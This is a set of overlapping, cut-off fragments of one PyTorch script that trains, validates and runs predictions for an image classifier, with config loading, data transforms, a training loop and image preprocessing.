"{x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle= True, num_workers=0) for x in ['train', 'valid']} dataset_sizes =",
"# provided std img = (img - mean) / std return img #",
"for idx in top_indices] # print(\"Img:\" ,img_names) for i, img_name in enumerate(img_names): predictions[img_name]",
"class_to_idx.items()} def predict(model_path, dataloader, print_progress=False): \"\"\" :param model_path: Path of Model used for",
"1) # output1 = torch.mul(output1,100).to(device) loss = criterion(output1, labels) valid_loss += loss.item() *",
"labels) in enumerate(dataloaders['valid']): inputs = inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device) labels",
"function :param optimizer: Optimizer :param num_epochs: Number of epochs :param dataloaders: Dataloaders, must",
"0.225]) data_transforms = { 'train': transforms.Compose([ transforms.Resize((230, 230)), transforms.RandomRotation(30,), transforms.RandomCrop(224), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.ToTensor(),",
"provided mean std = np.array([0.229, 0.224, 0.225]) # provided std img = (img",
"= (img - mean) / std return img # Load test dataset from",
"num_workers=0) for x in ['train', 'valid']} dataset_sizes = {x: len(image_datasets[x]) for x in",
"prints progress if true :return: trained model object \"\"\" min_val_loss = np.Inf best_model_wts",
"images.to(device) logps = model(images) ps = torch.exp(logps) # Top indices _, top_indices =",
"array \"\"\" img = Image.open(img_path) # Resize if img.size[0] > img.size[1]: img.thumbnail((10000, 256))",
"train and val as keys :param print_progress: prints progress if true :return: trained",
"std img = (img - mean) / std return img # Load test",
"datetime from utils import * data_dir = '.' test_path = os.path.join(data_dir, 'test') sample_sub",
"{epoch}\\t{100 * (iter2 + 1) / len(dataloaders[\"valid\"]):.2f} %', end='\\r') len_train1 = 6552 len_val1",
"transforms.RandomVerticalFlip(), transforms.ToTensor(), normalize ]), 'valid': transforms.Compose([ transforms.Resize((400, 400)), transforms.CenterCrop((224, 224)), transforms.ToTensor(), normalize ]),",
"= {} with torch.no_grad(): for ii, (images, _, img_names) in enumerate(dataloader, start=1): if",
"else \"cpu\") model.to(device) model.eval() predictions = {} with torch.no_grad(): for ii, (images, _,",
"transforms normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) data_transforms = { 'train':",
"+ 1} \\tTraining Loss: {math.sqrt(train_loss):.4f} \\tValidation Loss: {math.sqrt(valid_loss):.4f}') time_elapsed = time.time() - since",
"(inputs, labels) in enumerate(dataloaders['train']): inputs = inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device)",
"out = model(inputs) _, preds = torch.max(out, 1) # out = torch.mul(out,100) loss",
"datasets,models import math import torch.optim as optim from torch.optim import lr_scheduler import copy",
"= (img.width - 224) / 2 bottom_margin = (img.height - 224) / 2",
"img.crop((left_margin, bottom_margin, right_margin, top_margin)) # Normalize img = np.array(img) / 255 mean =",
"return model def process_image(img_path): \"\"\" :param img_path: Path of image to be processed",
"print(f'Best Epoch: {best_epoch+1}') model.load_state_dict(best_model_wts) return model def process_image(img_path): \"\"\" :param img_path: Path of",
"time from PIL import Image from datetime import datetime from utils import *",
"classes top_classes = [idx_to_class[idx[0]] for idx in top_indices] # print(\"Img:\" ,img_names) for i,",
":returns processed numpy array Scales, crops, and normalizes a PIL image for a",
"= -1 for epoch in range(num_epochs): valid_loss = 0.0 train_loss = 0.0 model.train()",
"utils test_dataset = TestDataset(data_dir+'test', sample_sub,data_transforms['test']) test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False) # Load Class",
"of Model used for prediction :param dataloader: Test DataLoader :param print_progress: Prints progress",
"= model(inputs) _, preds1 = torch.max(output1, 1) # output1 = torch.mul(output1,100).to(device) loss =",
"(iter2 + 1) / len(dataloaders[\"valid\"]):.2f} %', end='\\r') len_train1 = 6552 len_val1 = len(dataloaders['valid'].dataset)",
"processing, CSV file I/O (e.g. pd.read_csv) import os import torch import torchvision import",
"Get configs from config file stream = open(\"config.yaml\", 'r') config_dict = yaml.safe_load(stream) batch_size",
"if print_progress: print( f\"Epoch: {epoch}\\t{100 * (iter1 + 1) / len(dataloaders['train']):.2f}\" + '%',",
"top_margin)) # Normalize img = np.array(img) / 255 mean = np.array([0.485, 0.456, 0.406])",
"np.Inf best_model_wts = copy.deepcopy(model.state_dict()) since = time.time() best_epoch = -1 for epoch in",
"0: print('Batch {}/{}'.format(ii, len(dataloader))) images = images.to(device) logps = model(images) ps = torch.exp(logps)",
"lr_scheduler import copy import time from PIL import Image from datetime import datetime",
"= config_dict['batch_size'] learning_rate = config_dict['lr'] model_pth = config_dict['model_pth'] train_data = config_dict['train_data'] valid_data =",
"{epoch + 1} \\tTraining Loss: {math.sqrt(train_loss):.4f} \\tValidation Loss: {math.sqrt(valid_loss):.4f}') time_elapsed = time.time() -",
"= sample_sub['file_name'].apply(lambda x: os.path.join(test_path, x)) # Get configs from config file stream =",
"yaml.safe_load(stream) batch_size = config_dict['batch_size'] learning_rate = config_dict['lr'] model_pth = config_dict['model_pth'] train_data = config_dict['train_data']",
"from class defined in utils test_dataset = TestDataset(data_dir+'test', sample_sub,data_transforms['test']) test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size,",
"np # linear algebra import pandas as pd # data processing, CSV file",
"data_transforms[x]) for x in ['train', 'valid']} dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle= True,",
"time_elapsed = time.time() - since print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed",
"in range(num_epochs): valid_loss = 0.0 train_loss = 0.0 model.train() running_corrects = 0 for",
"0.224, 0.225]) data_transforms = { 'train': transforms.Compose([ transforms.Resize((230, 230)), transforms.RandomRotation(30,), transforms.RandomCrop(224), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(),",
"{:4f}'.format(math.sqrt(min_val_loss))) print(f'Epoch completed: {epoch+1}') print(f'Best Epoch: {best_epoch+1}') model.load_state_dict(best_model_wts) return model def process_image(img_path): \"\"\"",
"transforms.ToTensor(), normalize ]), 'valid': transforms.Compose([ transforms.Resize((400, 400)), transforms.CenterCrop((224, 224)), transforms.ToTensor(), normalize ]), 'test':",
"1) # out = torch.mul(out,100) loss = criterion(out, labels) loss.backward() optimizer.step() train_loss +=",
"labels) valid_loss += loss.item() * inputs.size(0) running_corrects += torch.sum(preds1 == labels.data) print( f'Epoch:",
"to classes top_classes = [idx_to_class[idx[0]] for idx in top_indices] # print(\"Img:\" ,img_names) for",
"labels = labels.to(device) labels = labels.type(torch.long) optimizer.zero_grad() out = model(inputs) _, preds =",
"6552 len_val1 = len(dataloaders['valid'].dataset) train_loss = train_loss / len_train1 valid_loss = valid_loss /",
"model(inputs) _, preds1 = torch.max(output1, 1) # output1 = torch.mul(output1,100).to(device) loss = criterion(output1,",
"# running_corrects += torch.sum(preds == labels.data) if print_progress: print( f\"Epoch: {epoch}\\t{100 * (iter1",
"(e.g. pd.read_csv) import os import torch import torchvision import matplotlib.pyplot as plt import",
"True :return: Prediction(as a list) on test folder defined by config file \"\"\"",
"import datetime from utils import * data_dir = '.' test_path = os.path.join(data_dir, 'test')",
"0.456, 0.406], std=[0.229, 0.224, 0.225]) data_transforms = { 'train': transforms.Compose([ transforms.Resize((230, 230)), transforms.RandomRotation(30,),",
"model.load_state_dict(best_model_wts) return model def process_image(img_path): \"\"\" :param img_path: Path of image to be",
"as transforms from torchvision import datasets,models import math import torch.optim as optim from",
"must be a dictionary having train and val as keys :param print_progress: prints",
"print_progress=False): \"\"\" :param model_path: Path of Model used for prediction :param dataloader: Test",
"model.to(device) model.eval() predictions = {} with torch.no_grad(): for ii, (images, _, img_names) in",
"train_loss / len_train1 valid_loss = valid_loss / len_val1 if print_progress: print( f'\\nEpoch: {epoch",
"/ len(dataloaders[\"valid\"]):.2f} %', end='\\r') len_train1 = 6552 len_val1 = len(dataloaders['valid'].dataset) train_loss = train_loss",
"Image.open(img_path) # Resize if img.size[0] > img.size[1]: img.thumbnail((10000, 256)) else: img.thumbnail((256, 10000)) #",
"256)) else: img.thumbnail((256, 10000)) # Crop Image left_margin = (img.width - 224) /",
"right_margin, top_margin)) # Normalize img = np.array(img) / 255 mean = np.array([0.485, 0.456,",
"indices _, top_indices = ps.topk(1) top_indices = top_indices.detach().cpu().numpy().tolist() # Convert indices to classes",
"{:.0f}s'.format(time_elapsed // 60, time_elapsed % 60)) print(f'Accuracy : {100 * running_corrects / len_val1}",
"len_val1 if print_progress: print( f'\\nEpoch: {epoch + 1} \\tTraining Loss: {math.sqrt(train_loss):.4f} \\tValidation Loss:",
"%') if valid_loss < min_val_loss: min_val_loss = valid_loss best_epoch = epoch best_model_wts =",
"since = time.time() best_epoch = -1 for epoch in range(num_epochs): valid_loss = 0.0",
"batch_size=batch_size, shuffle= True, num_workers=0) for x in ['train', 'valid']} dataset_sizes = {x: len(image_datasets[x])",
"right_margin = left_margin + 224 top_margin = bottom_margin + 224 img = img.crop((left_margin,",
"1) / len(dataloaders[\"valid\"]):.2f} %', end='\\r') len_train1 = 6552 len_val1 = len(dataloaders['valid'].dataset) train_loss =",
"class defined in utils test_dataset = TestDataset(data_dir+'test', sample_sub,data_transforms['test']) test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False)",
"Number of epochs :param dataloaders: Dataloaders, must be a dictionary having train and",
"Loss: {math.sqrt(train_loss):.4f} \\tValidation Loss: {math.sqrt(valid_loss):.4f}') time_elapsed = time.time() - since print('Training complete in",
"num_epochs=3, dataloaders= dataloaders, print_progress=False): \"\"\" :param model: Model type object :param criterion: Loss",
"if valid_loss < min_val_loss: min_val_loss = valid_loss best_epoch = epoch best_model_wts = copy.deepcopy(model.state_dict())",
"top_indices = ps.topk(1) top_indices = top_indices.detach().cpu().numpy().tolist() # Convert indices to classes top_classes =",
"transforms.Resize((230, 230)), transforms.RandomRotation(30,), transforms.RandomCrop(224), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.ToTensor(), normalize ]), 'valid': transforms.Compose([ transforms.Resize((400, 400)),",
"Convert indices to classes top_classes = [idx_to_class[idx[0]] for idx in top_indices] # print(\"Img:\"",
"normalize ]), 'test': transforms.Compose([ transforms.Resize((224, 224)), transforms.ToTensor(), normalize ]), } # Load dataloaders",
"in top_indices] # print(\"Img:\" ,img_names) for i, img_name in enumerate(img_names): predictions[img_name] = top_classes[i]",
"'train': transforms.Compose([ transforms.Resize((230, 230)), transforms.RandomRotation(30,), transforms.RandomCrop(224), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.ToTensor(), normalize ]), 'valid': transforms.Compose([",
"labels = labels.type(torch.long) optimizer.zero_grad() out = model(inputs) _, preds = torch.max(out, 1) #",
"PIL image for a PyTorch model, returns a Numpy array \"\"\" img =",
"= '.' test_path = os.path.join(data_dir, 'test') sample_sub = pd.read_csv(os.path.join(data_dir, 'sample_submission.csv')) sample_sub['path'] = sample_sub['file_name'].apply(lambda",
"linear algebra import pandas as pd # data processing, CSV file I/O (e.g.",
"seaborn as sns import torch.nn as nn from torch.utils.data import Dataset, DataLoader import",
"for x in ['train', 'valid']} class_names = image_datasets['train'].classes device = torch.device(\"cuda:0\" if torch.cuda.is_available()",
"pd.read_csv) import os import torch import torchvision import matplotlib.pyplot as plt import seaborn",
"230)), transforms.RandomRotation(30,), transforms.RandomCrop(224), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.ToTensor(), normalize ]), 'valid': transforms.Compose([ transforms.Resize((400, 400)), transforms.CenterCrop((224,",
"(iter1 + 1) / len(dataloaders['train']):.2f}\" + '%', end='\\r') else: print() with torch.no_grad(): model.eval()",
"- since print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60)) print(f'Accuracy",
"torch.utils.data import Dataset, DataLoader import torchvision.transforms as transforms from torchvision import datasets,models import",
"config_dict['batch_size'] learning_rate = config_dict['lr'] model_pth = config_dict['model_pth'] train_data = config_dict['train_data'] valid_data = config_dict['valid_data']",
"dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle= True, num_workers=0) for x in ['train', 'valid']}",
"valid_loss / len_val1 if print_progress: print( f'\\nEpoch: {epoch + 1} \\tTraining Loss: {math.sqrt(train_loss):.4f}",
"a Numpy array \"\"\" img = Image.open(img_path) # Resize if img.size[0] > img.size[1]:",
"valid_data = config_dict['valid_data'] test_data = config_dict['test_data'] # Apply transforms normalize = transforms.Normalize(mean=[0.485, 0.456,",
"224) / 2 bottom_margin = (img.height - 224) / 2 right_margin = left_margin",
"torch.nn as nn from torch.utils.data import Dataset, DataLoader import torchvision.transforms as transforms from",
"mean std = np.array([0.229, 0.224, 0.225]) # provided std img = (img -",
"shuffle= True, num_workers=0) for x in ['train', 'valid']} dataset_sizes = {x: len(image_datasets[x]) for",
"if ii % 5 == 0: print('Batch {}/{}'.format(ii, len(dataloader))) images = images.to(device) logps",
"object \"\"\" min_val_loss = np.Inf best_model_wts = copy.deepcopy(model.state_dict()) since = time.time() best_epoch =",
"Dataset, DataLoader import torchvision.transforms as transforms from torchvision import datasets,models import math import",
"\"\"\" :param model_path: Path of Model used for prediction :param dataloader: Test DataLoader",
"device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\") # Trains Model def train_model2(model, criterion,",
"= img.crop((left_margin, bottom_margin, right_margin, top_margin)) # Normalize img = np.array(img) / 255 mean",
"inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long) optimizer.zero_grad() out = model(inputs) _, preds",
"top_indices.detach().cpu().numpy().tolist() # Convert indices to classes top_classes = [idx_to_class[idx[0]] for idx in top_indices]",
"ii % 5 == 0: print('Batch {}/{}'.format(ii, len(dataloader))) images = images.to(device) logps =",
"inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long) output1 = model(inputs)",
"ps = torch.exp(logps) # Top indices _, top_indices = ps.topk(1) top_indices = top_indices.detach().cpu().numpy().tolist()",
"# print(\"Img:\" ,img_names) for i, img_name in enumerate(img_names): predictions[img_name] = top_classes[i] print('\\nPrediction Generation",
"data_dir = '.' test_path = os.path.join(data_dir, 'test') sample_sub = pd.read_csv(os.path.join(data_dir, 'sample_submission.csv')) sample_sub['path'] =",
"std return img # Load test dataset from class defined in utils test_dataset",
"plt import seaborn as sns import torch.nn as nn from torch.utils.data import Dataset,",
"= bottom_margin + 224 img = img.crop((left_margin, bottom_margin, right_margin, top_margin)) # Normalize img",
"= transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) data_transforms = { 'train': transforms.Compose([ transforms.Resize((230,",
"f\"Epoch: {epoch}\\t{100 * (iter1 + 1) / len(dataloaders['train']):.2f}\" + '%', end='\\r') else: print()",
"valid_loss < min_val_loss: min_val_loss = valid_loss best_epoch = epoch best_model_wts = copy.deepcopy(model.state_dict()) print('Best",
"batch_size=batch_size, shuffle=False) # Load Class to idx dictionary class_to_idx = image_datasets['valid'].class_to_idx idx_to_class =",
"test_path = os.path.join(data_dir, 'test') sample_sub = pd.read_csv(os.path.join(data_dir, 'sample_submission.csv')) sample_sub['path'] = sample_sub['file_name'].apply(lambda x: os.path.join(test_path,",
"== labels.data) print( f'Epoch: {epoch}\\t{100 * (iter2 + 1) / len(dataloaders[\"valid\"]):.2f} %', end='\\r')",
"== labels.data) if print_progress: print( f\"Epoch: {epoch}\\t{100 * (iter1 + 1) / len(dataloaders['train']):.2f}\"",
"optimizer.step() train_loss += loss.item() * inputs.size(0) # running_corrects += torch.sum(preds == labels.data) if",
"in ['train', 'valid']} dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'valid']} class_names",
"transforms.ToTensor(), normalize ]), 'test': transforms.Compose([ transforms.Resize((224, 224)), transforms.ToTensor(), normalize ]), } # Load",
"print_progress: if ii % 5 == 0: print('Batch {}/{}'.format(ii, len(dataloader))) images = images.to(device)",
"start=1): if print_progress: if ii % 5 == 0: print('Batch {}/{}'.format(ii, len(dataloader))) images",
"mean = np.array([0.485, 0.456, 0.406]) # provided mean std = np.array([0.229, 0.224, 0.225])",
"224 top_margin = bottom_margin + 224 img = img.crop((left_margin, bottom_margin, right_margin, top_margin)) #",
"folder defined by config file \"\"\" model = torch.load(model_path) device = torch.device(\"cuda\" if",
"import datasets,models import math import torch.optim as optim from torch.optim import lr_scheduler import",
"x), data_transforms[x]) for x in ['train', 'valid']} dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle=",
"< min_val_loss: min_val_loss = valid_loss best_epoch = epoch best_model_wts = copy.deepcopy(model.state_dict()) print('Best val",
"torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model.to(device) model.eval() predictions = {} with torch.no_grad(): for",
"400)), transforms.CenterCrop((224, 224)), transforms.ToTensor(), normalize ]), 'test': transforms.Compose([ transforms.Resize((224, 224)), transforms.ToTensor(), normalize ]),",
"from torch.optim import lr_scheduler import copy import time from PIL import Image from",
"normalize ]), } # Load dataloaders image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for",
"utils import * data_dir = '.' test_path = os.path.join(data_dir, 'test') sample_sub = pd.read_csv(os.path.join(data_dir,",
"config file stream = open(\"config.yaml\", 'r') config_dict = yaml.safe_load(stream) batch_size = config_dict['batch_size'] learning_rate",
"inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long) optimizer.zero_grad() out =",
"\"\"\" model = torch.load(model_path) device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model.to(device) model.eval()",
"in class_to_idx.items()} def predict(model_path, dataloader, print_progress=False): \"\"\" :param model_path: Path of Model used",
"as pd # data processing, CSV file I/O (e.g. pd.read_csv) import os import",
"Load test dataset from class defined in utils test_dataset = TestDataset(data_dir+'test', sample_sub,data_transforms['test']) test_loader",
"len_train1 valid_loss = valid_loss / len_val1 if print_progress: print( f'\\nEpoch: {epoch + 1}",
"= (img.height - 224) / 2 right_margin = left_margin + 224 top_margin =",
"# Load test dataset from class defined in utils test_dataset = TestDataset(data_dir+'test', sample_sub,data_transforms['test'])",
"a PIL image for a PyTorch model, returns a Numpy array \"\"\" img",
"labels = labels.type(torch.long) output1 = model(inputs) _, preds1 = torch.max(output1, 1) # output1",
"config file \"\"\" model = torch.load(model_path) device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")",
"inputs.size(0) running_corrects += torch.sum(preds1 == labels.data) print( f'Epoch: {epoch}\\t{100 * (iter2 + 1)",
"as keys :param print_progress: prints progress if true :return: trained model object \"\"\"",
"epochs :param dataloaders: Dataloaders, must be a dictionary having train and val as",
"]), 'valid': transforms.Compose([ transforms.Resize((400, 400)), transforms.CenterCrop((224, 224)), transforms.ToTensor(), normalize ]), 'test': transforms.Compose([ transforms.Resize((224,",
"= time.time() - since print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed %",
"as sns import torch.nn as nn from torch.utils.data import Dataset, DataLoader import torchvision.transforms",
"idx dictionary class_to_idx = image_datasets['valid'].class_to_idx idx_to_class = {val: key for key, val in",
"= labels.to(device) labels = labels.type(torch.long) output1 = model(inputs) _, preds1 = torch.max(output1, 1)",
"data processing, CSV file I/O (e.g. pd.read_csv) import os import torch import torchvision",
"class_names = image_datasets['train'].classes device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\") # Trains Model",
"model = torch.load(model_path) device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model.to(device) model.eval() predictions",
"in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60)) print(f'Accuracy : {100 * running_corrects",
"dataloader, print_progress=False): \"\"\" :param model_path: Path of Model used for prediction :param dataloader:",
"0.224, 0.225]) # provided std img = (img - mean) / std return",
":param dataloader: Test DataLoader :param print_progress: Prints progress if True :return: Prediction(as a",
"normalize ]), 'valid': transforms.Compose([ transforms.Resize((400, 400)), transforms.CenterCrop((224, 224)), transforms.ToTensor(), normalize ]), 'test': transforms.Compose([",
"/ 2 bottom_margin = (img.height - 224) / 2 right_margin = left_margin +",
"image_datasets['train'].classes device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\") # Trains Model def train_model2(model,",
"loss.item() * inputs.size(0) running_corrects += torch.sum(preds1 == labels.data) print( f'Epoch: {epoch}\\t{100 * (iter2",
"+= torch.sum(preds1 == labels.data) print( f'Epoch: {epoch}\\t{100 * (iter2 + 1) / len(dataloaders[\"valid\"]):.2f}",
"print( f'Epoch: {epoch}\\t{100 * (iter2 + 1) / len(dataloaders[\"valid\"]):.2f} %', end='\\r') len_train1 =",
": {100 * running_corrects / len_val1} %') if valid_loss < min_val_loss: min_val_loss =",
"import Image from datetime import datetime from utils import * data_dir = '.'",
"# Top indices _, top_indices = ps.topk(1) top_indices = top_indices.detach().cpu().numpy().tolist() # Convert indices",
"running_corrects += torch.sum(preds == labels.data) if print_progress: print( f\"Epoch: {epoch}\\t{100 * (iter1 +",
"= copy.deepcopy(model.state_dict()) since = time.time() best_epoch = -1 for epoch in range(num_epochs): valid_loss",
"crops, and normalizes a PIL image for a PyTorch model, returns a Numpy",
"torch.optim import lr_scheduler import copy import time from PIL import Image from datetime",
"else \"cpu\") # Trains Model def train_model2(model, criterion, optimizer, num_epochs=3, dataloaders= dataloaders, print_progress=False):",
"def train_model2(model, criterion, optimizer, num_epochs=3, dataloaders= dataloaders, print_progress=False): \"\"\" :param model: Model type",
"len_train1 = 6552 len_val1 = len(dataloaders['valid'].dataset) train_loss = train_loss / len_train1 valid_loss =",
"key, val in class_to_idx.items()} def predict(model_path, dataloader, print_progress=False): \"\"\" :param model_path: Path of",
"# data processing, CSV file I/O (e.g. pd.read_csv) import os import torch import",
"* inputs.size(0) running_corrects += torch.sum(preds1 == labels.data) print( f'Epoch: {epoch}\\t{100 * (iter2 +",
"test folder defined by config file \"\"\" model = torch.load(model_path) device = torch.device(\"cuda\"",
"(img.height - 224) / 2 right_margin = left_margin + 224 top_margin = bottom_margin",
"min_val_loss: min_val_loss = valid_loss best_epoch = epoch best_model_wts = copy.deepcopy(model.state_dict()) print('Best val Loss:",
"train_loss = 0.0 model.train() running_corrects = 0 for iter1, (inputs, labels) in enumerate(dataloaders['train']):",
":param img_path: Path of image to be processed :returns processed numpy array Scales,",
"import torch import torchvision import matplotlib.pyplot as plt import seaborn as sns import",
"torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle= True, num_workers=0) for x in ['train', 'valid']} dataset_sizes = {x:",
"progress if true :return: trained model object \"\"\" min_val_loss = np.Inf best_model_wts =",
"from torch.utils.data import Dataset, DataLoader import torchvision.transforms as transforms from torchvision import datasets,models",
"completed: {epoch+1}') print(f'Best Epoch: {best_epoch+1}') model.load_state_dict(best_model_wts) return model def process_image(img_path): \"\"\" :param img_path:",
"images = images.to(device) logps = model(images) ps = torch.exp(logps) # Top indices _,",
"sample_sub,data_transforms['test']) test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False) # Load Class to idx dictionary class_to_idx",
"Dataloaders, must be a dictionary having train and val as keys :param print_progress:",
"in ['train', 'valid']} dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle= True, num_workers=0) for x",
"loss = criterion(out, labels) loss.backward() optimizer.step() train_loss += loss.item() * inputs.size(0) # running_corrects",
"val in class_to_idx.items()} def predict(model_path, dataloader, print_progress=False): \"\"\" :param model_path: Path of Model",
"= np.array(img) / 255 mean = np.array([0.485, 0.456, 0.406]) # provided mean std",
"a list) on test folder defined by config file \"\"\" model = torch.load(model_path)",
"on test folder defined by config file \"\"\" model = torch.load(model_path) device =",
"= image_datasets['valid'].class_to_idx idx_to_class = {val: key for key, val in class_to_idx.items()} def predict(model_path,",
"_, img_names) in enumerate(dataloader, start=1): if print_progress: if ii % 5 == 0:",
"224)), transforms.ToTensor(), normalize ]), } # Load dataloaders image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x),",
"loss.item() * inputs.size(0) # running_corrects += torch.sum(preds == labels.data) if print_progress: print( f\"Epoch:",
"test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False) # Load Class to idx dictionary class_to_idx =",
"/ std return img # Load test dataset from class defined in utils",
"\"cpu\") model.to(device) model.eval() predictions = {} with torch.no_grad(): for ii, (images, _, img_names)",
"def predict(model_path, dataloader, print_progress=False): \"\"\" :param model_path: Path of Model used for prediction",
"inputs = inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long) optimizer.zero_grad()",
"-1 for epoch in range(num_epochs): valid_loss = 0.0 train_loss = 0.0 model.train() running_corrects",
"'test': transforms.Compose([ transforms.Resize((224, 224)), transforms.ToTensor(), normalize ]), } # Load dataloaders image_datasets =",
"= images.to(device) logps = model(images) ps = torch.exp(logps) # Top indices _, top_indices",
"= { 'train': transforms.Compose([ transforms.Resize((230, 230)), transforms.RandomRotation(30,), transforms.RandomCrop(224), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.ToTensor(), normalize ]),",
"\\tTraining Loss: {math.sqrt(train_loss):.4f} \\tValidation Loss: {math.sqrt(valid_loss):.4f}') time_elapsed = time.time() - since print('Training complete",
"- 224) / 2 right_margin = left_margin + 224 top_margin = bottom_margin +",
"inputs = inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long) output1",
"top_classes = [idx_to_class[idx[0]] for idx in top_indices] # print(\"Img:\" ,img_names) for i, img_name",
"Loss function :param optimizer: Optimizer :param num_epochs: Number of epochs :param dataloaders: Dataloaders,",
"Epoch: {best_epoch+1}') model.load_state_dict(best_model_wts) return model def process_image(img_path): \"\"\" :param img_path: Path of image",
"if torch.cuda.is_available() else \"cpu\") # Trains Model def train_model2(model, criterion, optimizer, num_epochs=3, dataloaders=",
"model(inputs) _, preds = torch.max(out, 1) # out = torch.mul(out,100) loss = criterion(out,",
"enumerate(dataloader, start=1): if print_progress: if ii % 5 == 0: print('Batch {}/{}'.format(ii, len(dataloader)))",
"* running_corrects / len_val1} %') if valid_loss < min_val_loss: min_val_loss = valid_loss best_epoch",
"if torch.cuda.is_available() else \"cpu\") model.to(device) model.eval() predictions = {} with torch.no_grad(): for ii,",
"'r') config_dict = yaml.safe_load(stream) batch_size = config_dict['batch_size'] learning_rate = config_dict['lr'] model_pth = config_dict['model_pth']",
"of image to be processed :returns processed numpy array Scales, crops, and normalizes",
"file \"\"\" model = torch.load(model_path) device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model.to(device)",
"shuffle=False) # Load Class to idx dictionary class_to_idx = image_datasets['valid'].class_to_idx idx_to_class = {val:",
"running_corrects += torch.sum(preds1 == labels.data) print( f'Epoch: {epoch}\\t{100 * (iter2 + 1) /",
"print_progress: prints progress if true :return: trained model object \"\"\" min_val_loss = np.Inf",
"normalizes a PIL image for a PyTorch model, returns a Numpy array \"\"\"",
"# linear algebra import pandas as pd # data processing, CSV file I/O",
"60, time_elapsed % 60)) print(f'Accuracy : {100 * running_corrects / len_val1} %') if",
"defined in utils test_dataset = TestDataset(data_dir+'test', sample_sub,data_transforms['test']) test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False) #",
":param optimizer: Optimizer :param num_epochs: Number of epochs :param dataloaders: Dataloaders, must be",
"= model(images) ps = torch.exp(logps) # Top indices _, top_indices = ps.topk(1) top_indices",
"% 60)) print(f'Accuracy : {100 * running_corrects / len_val1} %') if valid_loss <",
"model object \"\"\" min_val_loss = np.Inf best_model_wts = copy.deepcopy(model.state_dict()) since = time.time() best_epoch",
"= config_dict['valid_data'] test_data = config_dict['test_data'] # Apply transforms normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],",
"import seaborn as sns import torch.nn as nn from torch.utils.data import Dataset, DataLoader",
"import Dataset, DataLoader import torchvision.transforms as transforms from torchvision import datasets,models import math",
"from utils import * data_dir = '.' test_path = os.path.join(data_dir, 'test') sample_sub =",
"be processed :returns processed numpy array Scales, crops, and normalizes a PIL image",
"(img - mean) / std return img # Load test dataset from class",
"x in ['train', 'valid']} class_names = image_datasets['train'].classes device = torch.device(\"cuda:0\" if torch.cuda.is_available() else",
"Scales, crops, and normalizes a PIL image for a PyTorch model, returns a",
"/ 2 right_margin = left_margin + 224 top_margin = bottom_margin + 224 img",
"for ii, (images, _, img_names) in enumerate(dataloader, start=1): if print_progress: if ii %",
"and normalizes a PIL image for a PyTorch model, returns a Numpy array",
"= labels.type(torch.long) optimizer.zero_grad() out = model(inputs) _, preds = torch.max(out, 1) # out",
"- 224) / 2 bottom_margin = (img.height - 224) / 2 right_margin =",
"= labels.to(device) labels = labels.type(torch.long) optimizer.zero_grad() out = model(inputs) _, preds = torch.max(out,",
"torch.mul(out,100) loss = criterion(out, labels) loss.backward() optimizer.step() train_loss += loss.item() * inputs.size(0) #",
"if True :return: Prediction(as a list) on test folder defined by config file",
"sns import torch.nn as nn from torch.utils.data import Dataset, DataLoader import torchvision.transforms as",
"/ len_val1} %') if valid_loss < min_val_loss: min_val_loss = valid_loss best_epoch = epoch",
":param dataloaders: Dataloaders, must be a dictionary having train and val as keys",
"os.path.join(data_dir, 'test') sample_sub = pd.read_csv(os.path.join(data_dir, 'sample_submission.csv')) sample_sub['path'] = sample_sub['file_name'].apply(lambda x: os.path.join(test_path, x)) #",
"model_pth = config_dict['model_pth'] train_data = config_dict['train_data'] valid_data = config_dict['valid_data'] test_data = config_dict['test_data'] #",
"output1 = torch.mul(output1,100).to(device) loss = criterion(output1, labels) valid_loss += loss.item() * inputs.size(0) running_corrects",
